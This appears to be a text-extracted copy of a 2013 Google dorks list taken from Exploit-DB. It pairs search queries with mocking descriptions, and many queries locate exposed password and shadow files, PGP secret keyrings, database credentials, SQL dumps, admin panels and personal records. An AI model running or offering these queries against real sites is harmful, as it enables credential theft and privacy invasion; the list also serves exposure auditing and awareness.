Packetstorm Google Dorks List

476
Google Dorks Here is a collection of Dorks Submitted to Exploit-db.com. Collected on December 24, 2013 . This below tables shows the title of the dork, the actual dork that we use and third description of the dork. I copied raw data from www.exploit-db.com . No changes have done. You are free to use these dorks collection for any purpose. TITTLE DORK DESCRIPTION squid cache server reports "cacheserverreport for" "This analysis was produced by calamaris" These are squid server cache reports. Fairly benign, really except when you consider using them for evil purposes. For example, an institution stands up a proxy server for their internal users to get to the outside world. Then, the internal user surf all over to their hearts content (including intranet pages cuz well, the admins are stupid) Voila, intranet links show up in the external cache report. Want to make matters worse for yourself as an admin? OK, configure your external proxy server as a trusted internal host. Load up your web browser, set your proxy as their proxy and surf your way into their intranet. Not that I've noticed any examples of this in this google list. *COUGH* *COUGH* *COUGH* unresolved DNS lookups give clues *COUGH* *COUGH* ('scuse me. must be a furball) OK, lets say BEST CASE scenario. Let's say there's not security problems revealed in these logs. Best case scenario is that outsiders can see what your company/agency/workers are surfing. Ganglia Cluster Reports intitle:"Ganglia" "Cluster Report for" These are server cluster reports, great for info gathering. Lesse, what were those server names again? ICQ chat logs, please... intitle:"Index of" dbconvert.exe chats ICQ (http://www.icq.com) allows you to store the contents of your online chats into a file. These folks have their

Transcript of Packetstorm Google Dorks List

Page 1: Packetstorm Google Dorks List

Google DorksHere is a collection of Dorks Submitted to Exploit-db.com. Collected on December 24, 2013 .

This below tables shows the title of the dork, the actual dork that we use and third description of thedork. I copied raw data from www.exploit-db.com. No changes have done. You are free to use thesedorks collection for any purpose.

TITTLE DORK DESCRIPTION

squid cache serverreports

"cacheserverreport for" "Thisanalysis was produced bycalamaris"

These are squid server cache reports.Fairly benign, really except when youconsider using them for evil purposes.For example, an institution stands up aproxy server for their internal users toget to the outside world. Then, theinternal user surf all over to their heartscontent (including intranet pages cuzwell, the admins are stupid) Voila,intranet links show up in the externalcache report. Want to make mattersworse for yourself as an admin? OK,configure your external proxy server asa trusted internal host. Load up yourweb browser, set your proxy as theirproxy and surf your way into theirintranet. Not that I've noticed anyexamples of this in this google list.*COUGH* *COUGH* *COUGH*unresolved DNS lookups give clues*COUGH* *COUGH* ('scuse me.must be a furball) OK, lets say BESTCASE scenario. Let's say there's notsecurity problems revealed in theselogs. Best case scenario is thatoutsiders can see what yourcompany/agency/workers are surfing.

Ganglia ClusterReports

intitle:"Ganglia" "Cluster Reportfor"

These are server cluster reports, greatfor info gathering. Lesse, what werethose server names again?

ICQ chat logs,please...

intitle:"Index of" dbconvert.exechats

ICQ (http://www.icq.com) allows youto store the contents of your onlinechats into a file. These folks have their

Page 2: Packetstorm Google Dorks List

entire ICQ directories online. Onpurpose?

Apache onlinedocumentation

intitle:"Apache HTTP Server"intitle:"documentation"

When you install the Apache webserver, you get a nice set of onlinedocumentation. When you learn how touse Apache, your supposed to deletethese online Apache manuals. Thesesites didn't. If they're in such a hurrywith Apache installs, I wonder whatelse they rushed through?

Coldfusion ErrorPages

"Error Diagnostic Information"intitle:"Error Occurred While"

These aren't too horribly bad, but thereare SO MANY of them. These sites gotgooglebotted while the site was having"technical difficulties." The resultingcached error message gives lots ofjuicy tidbits about the target site.

Financialspreadsheets:finance.xls

intitle:"Index of" finance.xls

"Hey! I have a great idea! Let's put ourfinances on our website in a secretdirectory so we can get to it wheneverwe need to!"

Financialspreadsheets:finances.xls

intitle:index.of finances.xls

"Hey! I have a great idea! Let's put ourfinances on our website in a secretdirectory so we can get to it wheneverwe need to!"

sQL data dumps "# Dumping data for table"

sQL database dumps. LOTS of data inthese. So much data, infact, I'm pressedto think of what else an ev1l hax0rwould like to know about a targetdatabase.. What's that? Usernames andpasswords you say? Patience,grasshopper.....

bash_history files intitle:index.of .bash_history

Ok, this file contains what a user typedat a shell command prompt. Youshouldn't advertise this file. Youshouldn't flash it to a web crawler. Itcontains COMMANDS andUSERNAMES and stuff... *sigh*Sometimes there aren't words todescribe how lame people can be. Thisparticular theme can be carried furtherto find all sorts of things along theselines like .profile, .login, .logout files,etc. I just got bored with all thecombinations...

Page 3: Packetstorm Google Dorks List

sh_history files intitle:index.of .sh_history

Ok, this file contains what a user typedat a shell command prompt. Youshouldn't advertise this file. Youshouldn't flash it to a web crawler. Itcontains COMMANDS andUSERNAMES and stuff... *sigh*Sometimes there aren't words todescribe how lame people can be. Thisparticular theme can be carried furtherto find all sorts of things along theselines like .profile, .login, .logout files,etc. I just got bored with all thecombinations...

mysql history files intitle:"Index of" .mysql_history

The .mysql_history file containscommands that were performed againsta mysql database. A "history" of saidcommands. First, you shouldn't showthis file to anyone, especially not aMAJOR SEARCH ENGINE!Secondly, I sure hope you wouldn'ttype anything sensitive whileinteracting with your databases, like ohsay USERNAMES ANDPASSWORDS...

mt-db-pass.cgifiles intitle:index.of mt-db-pass.cgi

These folks had the technical prowessto unpack the movable type files, butcouldn't manage to set up their webservers properly. Check the mt.cfg filesfor interesting stuffs...

Windows 2000Internet Services

intitle:"Welcome to Windows 2000Internet Services"

At first glance, this search reveals evenmore examples of operating systemusers enabling the operating systemdefault web server software. This isgenerally accepted to be a BadIdea(TM) as mentioned in the previousexample. However, the googleDorkindex on this particular category getsquite a boost from the fact that thisparticular screen should NEVER beseen by the general public. To quotethe default index screen: "Any usersattempting to connect to this site arecurrently receiving an 'UnderConstruction page'" THIS is not the'Under Construction page.' I was only

Page 4: Packetstorm Google Dorks List

able to generate this screen whilesitting at the console of the server. Thefact that this screen is revealed to thegeneral public may indicate amisconfiguration of a much moreinsidious nature...

IIS 4.0 intitle:"Welcome to IIS 4.0"

Moving from personal, lightweightweb servers into more production-ready software, we find that evenadministrators of Microsoft's InternetInformation Server (IIS) sometimesdon't have a clue what they're doing.By searching on web pages with titlesof "Welcome to IIS 4.0" we find thateven if they've taken the time to changetheir main page, some dorks forget tochange the titles of their default-installed web pages. This is anindicator that their web server is mostlikely running, or was upgraded from,the now considered OLD IIS 4.0 andthat at least portions of their mainpages are still exactly the same as theywere out of the box. Conclusion? Therest of the factory-installed stuff ismost likely lingering around on theseservers as well. Old code: FREE withoperating system.Poor contentmanagement: an average of $40/hour.Factory-installed default scripts: FREEwith operating system.Getting hackedby a script kiddie that found you onGoogle: PRICELESS.For all the thingsmoney can't buy, there's a googleDorkaward.

Look in mybackup directories!Please?

"Index of /backup"

Backup directories are often veryinteresting places to explore. More thanone server has been compromised by ahacker's discovery of sensitiveinformation contained in backup filesor directories. Some of the sites in thissearch meant to reveal the contents oftheir backup directories, others did not.Think about it. What.s in YOURbackup directories? Would you care to

Page 5: Packetstorm Google Dorks List

share the contents with the whole of theonline world? Probably not. Whetherintentional or not, bsp.gsa.gov revealsbackup directory through Google. Isthis simply yet another misconfigured.gov site? You decide. BSP stands for"best security practices," winning thissite the Top GoogleDork award for thiscategory.

OpenBSD runningApache

"powered by openbsd" +"poweredby apache"

I like the OpenBSD operating system. Ireally do. And I like the Apache webserver software. Honestly. I admire themettle of administrators who take thetime to run quality, secure software.The problem is that you never knowwhen security problems will pop up. ABIG security problem popped upwithin the OpenBSD/Apache comboback in the day.Now, everyadministrator that advertised thisparticular combo with cute littlebanners has a problem. Hackers canfind them with Google. I go easy onthese folks since the odds are they.vepatched their sites already. Then again,they may just show up on zone-h..

intitle:index.ofintext:"secring.skr"|"secring.pgp"|"secring.bak"

intitle:index.ofintext:"secring.skr"|"secring.pgp"|"secring.bak"

PGP is a great encryption technology.It keeps secrets safe. Everyone fromdrug lords to the head of the DEA candownload PGP to encrypt theirsensitive documents. Everyone, that isexcept googleDorks. GoogleDorks, itseems, don't understand that anyone inpossession of your private keyring(secring) can get to your secret stuff. Itshould noever be given out, and shouldcertainly not be posted on the Internet.The highest ranking is awarded for thissurprising level of ineptitude.

people.lst intitle:index.of people.lst *sigh*

passwd intitle:index.of passwd passwd.bak

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google forthe world to see. Truly the epitome of agoogleDork. The hits in this search

Page 6: Packetstorm Google Dorks List

show "passwd" files which containencrypted passwords which may looklike this: "guest MMCHhvZ6ODgFo"A password cracker can eat cheesyhashes faster than Elvis eatin' jellydoughnuts. Bravo googleDorks! Goodshow!

master.passwd intitle:index.of master.passwd

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google forthe world to see. Truly the epitome of agoogleDork. The hits in this searchshow "master.passwd" files whichcontain encrypted passwords whichmay look like this: "guestMMCHhvZ6ODgFo" A passwordcracker can eat cheesy hashes fasterthan Elvis eatin' jelly doughnuts. BravogoogleDorks! Good show!Formaster.passwd, be sure to check otherfiles in the same directory...

pwd.db intitle:"Index of" pwd.db

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google forthe world to see. Truly the epitome of agoogleDork. The his in this searchshow "pwd.db" files which containencrypted passwords which may looklike this: "guest MMCHhvZ6ODgFo"A password cracker can eat cheesyhashes faster than Elvis eatin' jellydoughnuts. Bravo googleDorks! Goodshow!

htpasswd /htpasswd.bak

intitle:"Index of" ".htpasswd"htpasswd.bak

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google forthe world to see. Truly the epitome of agoogleDork. And what if thepasswords are hashed? A passwordcracker can eat cheesy password hashesfaster than Elvis eatin' jelly doughnuts.Bravo googleDorks! Good show!

htpasswd / htgroupintitle:"Index of" ".htpasswd""htgroup" -intitle:"dist" -apache -htpasswd.c

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google for

Page 7: Packetstorm Google Dorks List

the world to see. Truly the epitome of agoogleDork. And what if thepasswords are hashed? A passwordcracker can eat cheesy password hashesfaster than Elvis eatin' jelly doughnuts.Bravo googleDorks! Good show!You'llneed to sift through these results a bit...

spwd.db / passwd intitle:"Index of" spwd.db passwd -pam.conf

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google forthe world to see. Truly the epitome of agoogleDork. And what if thepasswords are hashed? A passwordcracker can eat cheesy password hashesfaster than Elvis eatin' jelly doughnuts.Bravo googleDorks! Good show!

passwd / etc(reliable) intitle:"Index of..etc" passwd

There's nothing that defines agoogleDork more than getting yourPASSWORDS grabbed by Google forthe world to see. Truly the epitome of agoogleDork. And what if thepasswords are hashed? A passwordcracker can eat cheesy password hashesfaster than Elvis eatin' jelly doughnuts.Bravo googleDorks! Good show!

AIM buddy lists buddylist.blt

These searches bring up commonnames for AOL Instant Messenger"buddylists". These lists contain screennames of your "online buddies" inInstant Messenger. Not that's not tooterribly exciting or stupid unless youwant to mess with someone's mind, andbesides, some people make thesepublic on purpose. The thing that'sinteresting are the files that get storedALONG WITH buddylists. Often thisstuff includes downloaded pictures,resumes, all sorts of things. This isreally for the peepers out there, and it'possible to spend countless hoursrifling through people's personal crap.Also try buddylist.blt, buddy.blt,buddies.blt.

config.php intitle:index.of config.php This search brings up sites with"config.php" files. To skip the

Page 8: Packetstorm Google Dorks List

technical discussion, this configurationfile contains both a username and apassword for an SQL database. Mostsites with forums run a PHP messagebase. This file gives you the keys tothat forum, including FULL ADMINaccess to the database. Way to go,googleDorks!!

phpinfo() intitle:phpinfo "PHP Version"

this brings up sites with phpinfo().There is SO much cool stuff in herethat you just have to check one out foryourself! I mean full blown systemversioning, SSL version, sendmailversion and path, ftp, LDAP, SQL info,Apache mods, Apache env vars, *sigh*the list goes on and on! Thanks "joe!"=)

MYSQL errormessage: suppliedargument....

"supplied argument is not a validMySQL result resource"

One of many potential error messagesthat spew interesting information. Theresults of this message give you realpath names inside the webserver aswell as more php scripts for potential"crawling" activities.

robots.txt intitle:index.of robots.txt

The robots.txt file contains "rules"about where web spiders are allowed(and NOT allowed) to look in awebsite's directory structure. Withoutover-complicating things, this meansthat the robots.txt file gives a mini-roadmap of what's somewhat publicand what's considered more private ona web site. Have a look at the robots.txtfile itself, it contains interestingstuff.However, don't forget to checkout the other files in these directoriessince they are usually at the topdirectory level of the web server!

passlist index.of passlist

I'm not sure what uses this, but thepasslist and passlist.txt files containpasswords in CLEARTEXT! That'sright, nodecoding/decrypting/encryptingrequired. How easy isthis?*sigh*Supreme googledorkage

Page 9: Packetstorm Google Dorks List

secret index.of.secretWhat kinds of goodies lurk indirectories marked as "secret?" Findout...

private index.of.privateWhat kinds of things might you find indirectories marked "private?" let's findout....

etc (index.of) index.of.etc

This search gets you access to the etcdirectory, where many many manytypes of password files can be found.This link is not as reliable, but crawlingetc directories can be really fun!

winnt index.of.winnt

The \WINNT directory is the directorythat Windows NT is installed into bydefault. Now just because google canfind them, this doesn't necessarilymean that these are Windows NTdirectories that made their way onto theweb. However, sometimes thishappens. Other times, they aren'tWindows NT directories, but backupdirectories for Windows NT data.Wither way, worthy of a nomination.

secure index.of.secure What could be hiding in directoriesmarked as "secure?" let's find out...

protected index.of.protected What could be in a directory marked as"protected?" Let's find out...

index.of.password index.of.password

These directories are named"password." I wonder what you mightfind in here. Warning: sometimes p0rnsites make directories on servers withdirectories named "password" andsingle html files inside named thingsliks "horny.htm" or "brittany.htm."These are to boost their search results.Don't click them (unless you want to beburied in an avalanche of p0rn...

"This report wasgenerated byWebLog"

"This report was generated byWebLog"

These are weblog-generated statisticsfor web sites... A roadmap of files,referrers, errors, statistics... yummy... aschmorgasbord! =P

"produced bygetstats"

"These statistics were produced bygetstats"

Another web statistics package. Thisone originated from a google scan of anivy league college. *sigh*There's sooo

Page 10: Packetstorm Google Dorks List

much stuff in here!

"generated bywwwstat"

"This summary was generated bywwwstat"

More www statistics on the web. Thisone is very nice.. Lots of directory info,and client access statistics, emailaddresses.. lots os good stuff.Youknow, these are SOOO dangerous,especially if INTRANET users getlogged... talk about mapping out anintranet quickly...thanks, sac =)

haccess.ctl (oneway) intitle:index.of haccess.ctl

this is the frontpage(?) equivalent ofhtaccess, I believe. Anyhow, this filedescribes who can access the directoryof the web server and where the otherauthorization files are. nice find.

haccess.ctl (VERYreliable) filetype:ctl Basic

haccess.ctl is the frontpage(?)equivalent of the .htaccess file. Eitherway, this file decribes who can access aweb page, and should not be shown toweb surfers. Way to go, googledork.=PThis method is very reliable due tothe use of this google query:filetype:ctlBasicThis pulls out the file by namethen searches for a string inside of it(Basic) which appears in the standardtemplate for this file.

filetype:xlsusernamepassword email

filetype:xls username passwordemail

This search shows Microsoft Excelspreadsheets containing the wordsusername, password and email. Bewarethat there are a ton of blank "template"forms to weed through, but you can tellfrom the Google summary that some ofthese are winners... err losers..depending on your perspective.

HassanConsulting'sShopping CartVersion 1.18

inurl:shop "Hassan Consulting'sShopping Cart Version 1.18"

These servers can be messed with inmany ways. One specific way is byway of the "../" bug. This lets youcruise around the web server in asomewhat limited fashion.

site:edu admingrades site:edu admin grades

I never really thought about this until Istarted coming up with juicy examplesfor DEFCON 11.. A fewGLARINGLY bad examples containnot only student grades and names, butalso social security numbers, securing

Page 11: Packetstorm Google Dorks List

the highest of all googledork ratings!

auth_user_file.txt allinurl:auth_user_file.txt

DCForum's password file. This filegives a list of (crackable) passwords,usernames and email addresses forDCForum and for DCShop (a shoppingcart program(!!!). Some lists are biggerthan others, all are fun, and all belongto googledorks. =)

inurl:config.phpdbuname dbpass inurl:config.php dbuname dbpass

The old config.php script. This puppyshould be held very closely. It shouldnever be viewable to your web visitorsbecause it contains CLEARTEXTusernames and passwords!The hishestof all googledorks ratings!

inurl:tech-supportinurl:show Cisco inurl:tech-support inurl:show Cisco

This is a way to find Cisco productswith an open web interface. These aregenerally supposed to be user andpassword protected. Google finds onesthat aren't. Be sure to use Google'scache if you have trouble connecting.Also, there are very few results (2 atthe time of posting.)

index_i.shtmlReady (Xeroxprinters on theweb!)

i_index.shtml Ready

These printers are not-only web-enabled, but their managementinterface somehow got crawled bygoogle! These puppies should not bepublic! You can really muck with theseprinters. In some cases, going to the"password.shtml" page, you can evenlock out the admins if a username andpassword has not already been set!Thanks to [email protected] the idea =)

aboutprinter.shtml(More Xeroxprinters on theweb!)

aboutprinter.shtml

More Xerox printers on the web!Google found these printers. Shouldtheir management interface be open tothe WHOLE INTERNET? I think not.

"ChatologicaMetaSearch""stack tracking"

"Chatologica MetaSearch" "stacktracking:"

There is soo much crap in this errormessage... Apache version, CGIenvironment vars, path names, stack-freaking-dumps, process ID's, perlversion, yadda yadda yadda...

mystuff.xml -Trillian data files intitle:index.of mystuff.xml This particular file contains web links

that trillian users have entered into the

Page 12: Packetstorm Google Dorks List

tool. Trillian combines many differentmessaging programs into one tool.AIM, MSN, Yahoo, ICQ, IRC, etc.Although this particular file is fairlybenign, check out the other files in thesame directory. There is usually greatstuff here!

trillian.ini intitle:index.of trillian.ini

Trillian pulls together all sort ofmessaging clients like AIM MSN,Yahoo, IRC, ICQ, etc. The various inifiles that trillian uses include files likeaim.ini and msn.ini. These ini filescontain encoded passwords, usernames,buddy lists, and all sorts of other funthings. Thanks for putting these on theweb for us, googledorks!

intitle:adminintitle:login intitle:admin intitle:login

Admin Login pages. Now, theexistance of this page does notnecessarily mean a server is vulnerable,but it sure is handy to let Google do thediscovering for you, no? Let's face it, ifyou're trying to hack into a web server,this is one of the more obvious placesto poke.

ORA-00921:unexpected end ofSQL command

"ORA-00921: unexpected end ofSQL command"

Another SQL error message fromCesar. This one coughs up full webpathnames and/or php filenames.

passlist.txt (abetter way) inurl:passlist.txt Cleartext passwords. No decryption

required!

sitebuildercontent inurl:sitebuildercontent

This is a default directory for thesitebuilder web design softwareprogram. If these people posted webpages with default sitebuilder sirectorynames, I wonder what else they gotwrong?

sitebuilderfiles inurl:sitebuilderfiles

This is a default directory for thesitebuilder web design softwareprogram. If these people posted webpages with default sitebuilder sirectorynames, I wonder what else they gotwrong?

sitebuilderpictures inurl:sitebuilderpicturesThis is a default directory for thesitebuilder web design softwareprogram. If these people posted web

Page 13: Packetstorm Google Dorks List

pages with default sitebuilder sirectorynames, I wonder what else they gotwrong?

htpasswd filetype:htpasswd htpasswd

This is a nifty way to find htpasswdfiles. Htpasswd files contain usernamesand crackable passwords for web pagesand directories. They're supposed to beserver-side, not available to webclients! *duh*

"YaBB SE DevTeam" "YaBB SE Dev Team"

Yet Another Bulletin Board (YABB)SE (versions 1.5.4 and 1.5.5 andperhaps others) contain an SQLinjection vulnerability which mayallow several attacks includingunauthorized database modification orviewing. Seehttp://www.securityfocus.com/bid/9674for more information. Also seehttp://www.securityfocus.com/bid/9677for information about an informationleakage vulnerability in versions YaBBGold - Sp 1.3.1 and others.

EarlyImpactProductcart inurl:custva.asp

The EarlyImpact Productcart containsmultiple vulnerabilites, which couldexploited to allow an attacker to stealuser credentials or mount other attacks.Seehttp://www.securityfocus.com/bid/9669 for more informationfor moreinformation. Also seehttp://www.securityfocus.com/bid/9677for information about an informationleakage vulnerability in versions YaBBGold - Sp 1.3.1 and others.

mnGoSearchvulnerability

"Powered by mnoGoSearch - freeweb search engine software"

According tohttp://www.securityfocus.com/bid/9667, certain versions of mnGoSearchcontain a buffer overflow vulnerabilitywhich allow an attacker to executecommands on the server.

IIS 4.0 errormessages

intitle:"the page cannot be found"inetmgr

IIS 4.0 servers. Extrememly old,incredibly easy to hack...

Windows 2000web server error

intitle:"the page cannot be found""2004 microsoft corporation"

Windows 2000 web servers. Aging,fairly easy to hack, especially out of

Page 14: Packetstorm Google Dorks List

messages the box...

IIS web servererror messages

intitle:"the page cannot be found""internet information services"

This query finds various types of IISservers. This error message is fairlyindicative of a somewhat unmodifiedIIS server, meaning it may be easier tobreak into...

phpMyAdmindumps

"# phpMyAdmin MySQL-Dump"filetype:txt

From phpmyadmin.net :"phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the WWW." Great,easy to use, but don't leave yourdatabase dumps laying around on theweb. They contain all SORTS ofsensitive information...

phpMyAdmindumps

"# phpMyAdmin MySQL-Dump""INSERT INTO" -"the"

From phpmyadmin.net :"phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the WWW." Great,easy to use, but don't leave yourdatabase dumps laying around on theweb. They contain all SORTS ofsensitive information...

Gallery inconfigurationmode

intitle:"Gallery in Configurationmode"

Gallery is a nice little php program thatallows users to post personal pictureson their website. So handy, in fact, thatI use it on my site! However, theGallery configuration mode allowsoutsiders to make changes to yourgallery. This is why you shouldn't leaveyour gallery in configuration mode.These people, unfortunately, have donejust that!

cgiirc.conf intitle:index.of cgiirc.config

CGIIRC is a web-based IRC client.Very cool stuff. The cgiirc.config filelists the options for this porgram,including the default sites that can beattached to, server passwords, andcrypts of admin passwords. This file isfor CGIIRC, not Google surfers!

cgiirc.conf inurl:cgiirc.config

This is another less reliable way offinding the cgiirc.config file. CGIIRCis a web-based IRC client. Very coolstuff. The cgiirc.config file lists theoptions for this porgram, including the

Page 15: Packetstorm Google Dorks List

default sites that can be attached to,server passwords, and crypts of adminpasswords. This file is for CGIIRC, notGoogle surfers!

ipsec.secrets inurl:ipsec.secrets -history -bugs

from the manpage for ipsec_secrets: "Itis vital that these secrets be protected.The file should be owned by the super-user, and its permissions should be setto block all access by others." So let'smake it plain: DO NOT SHOW THISFILE TO ANYONE! Googledorksrejoice, these files are on the web!

ipsec.secrets inurl:ipsec.secrets "holds sharedsecrets"

from the manpage for ipsec_secrets: "Itis vital that these secrets be protected.The file should be owned by the super-user, and its permissions should be setto block all access by others." So let'smake it plain: DO NOT SHOW THISFILE TO ANYONE! Googledorksrejoice, these files are on the web!

ipsec.conf inurl:ipsec.conf -intitle:manpageThe ipsec.conf file could help hackersfigure out what uber-secure users offreeS/WAN are protecting....

Internal ServerError

intitle:"500 Internal Server Error""server at"

This one shows the type of web serverrunning on the site, and has the abilityto show other information dependingon how the message is internallyformatted.

mysql error withquery "mySQL error with query"

Another error message, this appearswhen an SQL query bails. This is ageneric mySQL message, so there's allsort of information hackers can use,depending on the actual errormessage...

sQL syntax error "You have an error in your SQLsyntax near"

Another generic SQL message, thismessage can display path names andpartial SQL code, both of which arevery helpful for hackers...

"Suppliedargument is not avalid MySQLresult resource"

"Supplied argument is not a validMySQL result resource"

Another generic SQL message, thismessage can display path names,function names, filenames and partialSQL code, all of which are very helpfulfor hackers...

Page 16: Packetstorm Google Dorks List

ORA-00936:missing expression "ORA-00936: missing expression"

A generic ORACLE error message,this message can display path names,function names, filenames and partialdatabase code, all of which are veryhelpful for hackers...

ORA-00921:unexpected end ofSQL command

"ORA-00921: unexpected end ofSQL command"

Another generic SQL message, thismessage can display path names,function names, filenames and partialSQL code, all of which are very helpfulfor hackers...

"ORA-00933:SQL command notproperly ended"

"ORA-00933: SQL command notproperly ended"

An Oracle error message, this messagecan display path names, functionnames, filenames and partial SQLcode, all of which are very helpful forhackers...

"Unclosedquotation markbefore thecharacter string"

"Unclosed quotation mark beforethe character string"

An SQL Server error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers...

"Incorrect syntaxnear" "Incorrect syntax near"

An SQL Server error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers...

"Incorrect syntaxnear" "Incorrect syntax near" -the

An SQL Server error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers...

"PostgreSQLquery failed:ERROR: parser:parse error"

"PostgreSQL query failed: ERROR:parser: parse error"

An PostgreSQL error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers...

supplied argumentis not a validPostgreSQL result

"Supplied argument is not a validPostgreSQL result"

An PostgreSQL error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers...

"Syntax error inquery expression "-the

"Syntax error in query expression "-the

An Access error message, this messagecan display path names, functionnames, filenames and partial code, all

Page 17: Packetstorm Google Dorks List

of which are very helpful for hackers..."An illegalcharacter has beenfound in thestatement" -"previousmessage"

"An illegal character has been foundin the statement" -"previousmessage"

An Informix error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers...

"A syntax errorhas occurred"filetype:ihtml

"A syntax error has occurred"filetype:ihtml

An Informix error message, thismessage can display path names,function names, filenames and partialcode, all of which are very helpful forhackers

"detected aninternal error[IBM][CLIDriver][DB2/6000]"

"detected an internal error[IBM][CLI Driver][DB2/6000]"

A DB2 error message, this message candisplay path names, function names,filenames, partial code and programstate, all of which are very helpful forhackers...

An unexpectedtoken "END-OF-STATEMENT"was found

An unexpected token "END-OF-STATEMENT" was found

A DB2 error message, this message candisplay path names, function names,filenames, partial code and programstate, all of which are very helpful forhackers...

intitle:"statisticsof" "advanced webstatistics"

intitle:"statistics of" "advanced webstatistics"

the awstats program shows webstatistics for web servers. Thisinformation includes who is visiting thesite, what pages they visit, error codesproduced, filetypes hosted on theserver, number of hits, and more whichcan provide very interesting reconinformation for an attacker.

intitle:"UsageStatistics for""Generated byWebalizer"

intitle:"Usage Statistics for""Generated by Webalizer"

The webalizer program shows webstatistics for web servers. Thisinformation includes who is visiting thesite, what pages they visit, error codesproduced, filetypes hosted on theserver, number of hits, referrers, exitpages, and more which can providevery interesting recon information foran attacker.

"robots.txt""Disallow:"filetype:txt

"robots.txt" "Disallow:" filetype:txt

The robots.txt file serves as a set ofinstructions for web crawlers. The"disallow" tag tells a web crawlerwhere NOT to look, for whateverreason. Hackers will always go to those

Page 18: Packetstorm Google Dorks List

places first!"Warning:pg_connect():Unable to connectto PostgreSQLserver: FATAL"

"Warning: pg_connect(): Unable toconnect to PostgreSQL server:FATAL"

This search reveals Postgresql serversin yet another way then we had seenbefore. Path information appears in theerror message and sometimes databasenames.

"phpMyAdmin""running on"inurl:"main.php"

"phpMyAdmin" "running on"inurl:"main.php"

From phpmyadmin.net :"phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the WWW." Great,easy to use, but lock it down! Thingsyou can do include viewing MySQLruntime information and systemvariables, show processes, reloadingMySQL, changing privileges, andmodifying or exporting databases.Hacker-fodder for sure!

inurl:main.phpphpMyAdmin inurl:main.php phpMyAdmin

From phpmyadmin.net :"phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the WWW." Great,easy to use, but lock it down! Thingsyou can do include viewing MySQLruntime information and systemvariables, show processes, reloadingMySQL, changing privileges, andmodifying or exporting databases.Hacker-fodder for sure!

inurl:main.phpWelcome tophpMyAdmin

inurl:main.php Welcome tophpMyAdmin

From phpmyadmin.net :"phpMyAdmin is a tool written in PHPintended to handle the administrationof MySQL over the WWW." Great,easy to use, but lock it down! Thingsyou can do include viewing MySQLruntime information and systemvariables, show processes, reloadingMySQL, changing privileges, andmodifying or exporting databases.Hacker-fodder for sure!

"Warning: Cannotmodify headerinformation -headers alreadysent"

"Warning: Cannot modify headerinformation - headers already sent"

A PHP error message, this message candisplay path names, function names,filenames and partial code, all of whichare very helpful for hackers...

Page 19: Packetstorm Google Dorks List

intitle:"wbem"compaq login"CompaqInformationTechnologiesGroup"

intitle:"wbem" compaq login"Compaq Information TechnologiesGroup"

These devices are running HP InsightManagement Agents for Servers which"provide device information for allmanaged subsystems. Alerts aregenerated by SNMP traps." Theinformation on these pages includeserver addresses and other assortedSNMP information.

intitle:osCommerce inurl:adminintext:"redistributable under theGNU"intext:"Online Catalog" -demo-site:oscommerce.com

intitle:osCommerce inurl:adminintext:"redistributable under theGNU"intext:"Online Catalog" -demo -site:oscommerce.com

This is a decent way to explore theadmin interface of osCommerce e-commerce sites. Depending on howbad the setup of the web store is, websurfers can even Google their way intocustomer details and order status, allfrom the Google cache.

intitle:index.of"Apache" "serverat"

intitle:index.of "Apache" "server at"

This is a very basic string found ondirectory listing pages which show theversion of the Apache web server.Hackers can use this information tofind vulnerable targets withoutquerying the servers.

"access denied foruser" "usingpassword"

"access denied for user" "usingpassword"

Another SQL error message, thismessage can display the username,database, path names and partial SQLcode, all of which are very helpful forhackers...

intitle:"Underconstruction""does not currentlyhave"

intitle:"Under construction" "doesnot currently have"

This error message can be used tonarrow down the operating system andweb server version which can be usedby hackers to mount a specific attack.

"seeing thisinstead"intitle:"test pagefor apache"

"seeing this instead" intitle:"testpage for apache"

This is the default web page forApache 1.3.11 - 1.3.26. Hackers canuse this information to determine theversion of the web server, or to searchGoogle for vulnerable targets. Inaddition, this indicates that the webserver is not well maintained.

intitle:"Test Pagefor Apache" "ItWorked!"

intitle:"Test Page for Apache" "ItWorked!"

This is the default web page forApache 1.2.6 - 1.3.9. Hackers can usethis information to determine theversion of the web server, or to searchGoogle for vulnerable targets. In

Page 20: Packetstorm Google Dorks List

addition, this indicates that the webserver is not well maintained.

intitle:"Test Pagefor Apache" "ItWorked!" "on thisweb"

intitle:"Test Page for Apache" "ItWorked!" "on this web"

This is the default web page forApache 1.2.6 - 1.3.9. Hackers can usethis information to determine theversion of the web server, or to searchGoogle for vulnerable targets. Inaddition, this indicates that the webserver is not well maintained.

"Can't connect tolocal"intitle:warning

"Can't connect to local"intitle:warning

Another SQL error message, thismessage can display database name,path names and partial SQL code, all ofwhich are very helpful for hackers...

intitle:index.ofdead.letter intitle:index.of dead.letter

dead.letter contains the contents ofunfinished emails created on the UNIXplatform. Emails (finished or not) cancontain sensitive information.

intitle:index.ofws_ftp.ini intitle:index.of ws_ftp.ini

ws_ftp.ini is a configuration file for apopular FTP client that storesusernames, (weakly) encodedpasswords, sites and directories that theuser can store for later reference. Theseshould not be on the web!

intitle:index.ofadministrators.pwd intitle:index.of administrators.pwd

This file contains administrative usernames and (weakly) encryptedpassword for Microsoft Front Page.The file should not be readble to thegeneral public.

inurl:secringext:skr | ext:pgp |ext:bak

inurl:secring ext:skr | ext:pgp |ext:bak

This file is the secret keyring for PGPencryption. Armed with this file (andperhaps a passphrase), a malicious usercan read all your encrypted files! Thisshould not be posted on the web!

intitle:Index.of etcshadow intitle:Index.of etc shadow

This file contains usernames and(lame) encrypted passwords! Armedwith this file and a decent passwordcracker, an attacker can crackpasswords and log into a UNIX system.

inurl:ManyServers.htm inurl:ManyServers.htm

Microsoft Terminal Services MultipleClients pages. These pages are notnecessarily insecure, sine many layersof security can be wrapped around theactual use of this service, but simply

Page 21: Packetstorm Google Dorks List

